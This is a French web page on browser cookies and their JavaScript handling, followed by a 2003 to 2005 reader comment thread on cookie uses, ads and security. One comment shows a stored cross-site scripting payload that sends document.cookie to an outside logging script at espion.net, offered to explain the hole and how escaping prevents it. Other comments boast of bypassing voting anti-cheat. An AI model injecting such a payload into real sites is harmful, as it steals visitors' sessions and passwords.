Les cookies sont des petits fichiers textes que les sites web peuvent stocker sur les disques durs de leurs visiteurs et relire à chacune de leurs visites.
Ils constituent ainsi la "mémoire" d'un site web, et permettent de faciliter la navigation dans ses pages.
Les exemples les plus classiques d'utilisation des cookies sont:
les compteurs de visite,
l'orientation des visiteurs vers leurs pages préférées,
la mémorisation des mots de passe et données d'un formulaire pour éviter leur ressaisie,
la gestion d'événements comme l'ouverture ou non d'une fenêtre popup,
l'affichage de pages personnalisées,
le passage de données d'une page à l'autre,
la gestion du contenu des caddies dans les sites de commerce électronique.
Il existe aussi des utilisations moins "amicales" des cookies, comme l'explique notre rubrique Big Brother vous observe.
Javascript, langage "côté client" très simple à mettre en oeuvre au sein d'une page HTML, est un outil particulièrement bien adapté à la gestion des cookies.
le 09/12/2003 à 04:18De:
[Site web] le cookie sert aussi à éviter qu'un webmaster s'amuse à voter pour son site sur un topsites toute la journée parceque la plupart des topsites ont un antitriche que j'arrive à retourner (mais attention cette technique ne marche pas avec tous les topsites !)
le 18/12/2003 à 09:59De:
[Site web] Si vous utilisez les cookies pour stocker les mots de passe des membres de vos sites, veillez à bien empêcher l'exécution de scripts sur chacun de vos formulaires (forum, commentaires,...). Sinon, il est très facile de récupérer les mots de passe d'autres visiteurs... (en php, utilisez strip_tags). Sinon, stockez les mots de passe cryptés (md5 par exemple)
le 30/01/2004 à 15:30De:
»J'aimerais bien comprendre comment tu fais cette récupération de mot de passe (ou d'autres infos stockées dans le cookie), non pas pour pirater qui que ce soit, mais pour comprendre la technique. Merci.
le 06/02/2004 à 00:51De:
[Site web] Pareil ! Merci.
le 11/02/2004 à 01:56De:
[Site web] Je crois que ca s'appelle le css ou cross site scripting. Ca se repand de plus en plus apparemment.
le 21/02/2004 à 22:56De:
[Site web] le css ? lol, comme les feuilles de style... et vive le xslt ! Sinon, bas oui, on voudrait tous savoir comment ça marche, ce cross site scripting.... mais pas dans des buts obscures, bien sûr...
le 03/03/2004 à 16:35De:
Je ne suis pas spécialiste, mais juste pour le principe... Imaginons que l'on est sur un forum Que les messages que l'on envoie ne sont pas échappés à l'affichage (pas de htmlentities( ), de htmlspecialchars( ) ou de strip_tags( )) => on peut exécuter du JavaScript Que le login/mot de passe est stocké en clair dans un cookie Il me suffit alors d'envoyer le msg suivant : <script type="text/javascript"> window.open("http://www.espion.net/log.php?s=" + document.cookie) ; </script> ... pour que _mon_ script log.php récupère toutes les infos contenues dans le cookie du visiteur lisant la page infectée. Heureusement vous empêchez tous l'interprétation du HTML et que les mots de passe stockés dans les cookies sont cryptés ;)
le 19/04/2004 à 10:39De:
[Site web] cross site scripting ne sont pas des feuilles de style... Tu exploites une faille qui te permet d'injecter du code malicieux
le 04/05/2004 à 21:07De:
[Site web] et oui c'est pas pareil mais il aurais dût l'appeler CSS la faille mais comme les feuilles de styles ont été découvert avant... ils ont appelé ça la faille XSS (recherchez sur google pour savoir l'exploiter ;) )
le 12/05/2004 à 18:50De:
Est-ce qu'il y a quelqu'un qui pourrait m'informer à propos de l'historique des cookies comme d'où ça vient, de qui, pourquoi et depuis quand. merci
le 27/06/2004 à 00:18De:
[Site web] " document.cookie " c est koi exactement ?? ca recupere les infos sur le cookie de l url ou le script est executé, c est ca ?? ++
le 22/07/2004 à 15:56De:
[Site web] le cookie est une proprieté de l'objet document. On y accède en java par 'document.cookie'. Ses attributs sont nom, domaine, valeur, chemin d'accès et date d'expiration. On peut créeer, lire et modifier un cookie. Je m'en sers principalement pour passer l'id de session des visiteurs au lieu de la faire passer dans l'url. C'est plus propre et cela permet d'éviter certains types d'intrusion (sous php).
le 22/07/2004 à 18:05De:
[Site web] pour ma part j'ai utilisé des cookies javascript de al solution urchin. C'est très utile pour mesurer les visiteurs uniques et mesurer la fidélité des internautes dans le cadre d'un site à forte audience.
le 01/09/2004 à 14:11De:
dois-je effacer les cookies stockés sur mon ordinateur au fil des connexion sur internet ?
le 22/10/2004 à 08:32De:
[Site web] >> réponse à pascal Pas obligé... Mais je fait souvent un nettoyage de mes cookies parce que çà prend dla place sur mon ordi...
le 02/01/2005 à 17:31De:
[Site web] Les coukies c'est bien quand on ve afficher une pub que 1 fois par visiteurs ! ca les fait moin chi*r
le 10/01/2005 à 12:03De:
[Site web] oui les pubs gérent le capping avec les cookies, alors si tu les interdit, tu en as à chaque page :) @++
le 19/01/2005 à 01:14De:
Quelle est la limite de taille d'un cookie ?
le 21/01/2005 à 20:42De:
[Site web] Fire Wolf a écrit : "le cookie sert aussi à éviter qu'un webmaster s'amuse à voter pour son site sur un topsites toute la journée" Honnètement, même avec un cookie y'a aucun moyen ... c'est tellement facile d'effacer un cookie !
le 05/02/2005 à 02:14De:
[Site web] En clair il vaut mieux effacer les cookies de temps a autre !
le 10/02/2005 à 12:13De:
[Site web] il faut arreter les cookies sont là pour te simplifier la vie la plupart du temps efface donc tes fichiers temporaraires, cela te sera plus utile
le 11/02/2005 à 09:43De:
[Site web] Oui les cookies simplifient la vie ( connexion directe sur les forums sans avoir à rentrer les mots de passe et identifiant, ou sur une boutique en ligne, etc ... ) et ils prennent très peu de place !
le 08/03/2005 à 15:33De:
Scooteur[Site web] Les cookies ce n'est rien ! comparés aux cochonneries comme les spyware et les adware !
le 06/10/2005 à 17:08De:
cyberoli je ne comprend rien de rien a vos charabias mais j'aimerais bien qu'on m'explique un peu... si c'est possible
Ajoutez un commentaire en direct :::
Il est temporairement impossible de poster un commentaire: nos modos sont en vacances. A bientôt;)